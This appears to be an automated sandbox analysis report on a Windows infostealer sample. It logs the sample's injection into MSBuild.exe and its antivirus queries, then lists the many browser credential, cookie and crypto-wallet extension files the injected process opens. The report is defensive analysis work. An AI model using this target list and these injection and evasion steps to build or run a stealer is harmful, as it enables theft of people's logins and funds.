        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B01358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF748B01358
        Source: MSBuild.exe, 00000002.00000002.2421942857.0000000000E8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP$
        Source: MSBuild.exe, 00000002.00000002.2422063672.0000000000EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_2-21693
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00449710 LdrInitializeThunk,2_2_00449710
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AFAB04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748AFAB04
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AFE2EC GetProcessHeap,0_2_00007FF748AFE2EC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AFAB04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748AFAB04
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF8704 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748AF8704
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF86F4 SetUnhandledExceptionFilter,0_2_00007FF748AF86F4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF8088 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF748AF8088

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DBE008Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B09520 cpuid 0_2_00007FF748B09520
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF8570 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF748AF8570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: MSBuild.exe, 00000002.00000002.2422631419.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2422063672.0000000000EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2421617824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: MSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: MSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: MSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: MSBuild.exe, 00000002.00000002.2422497815.0000000000F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb32
        Source: MSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
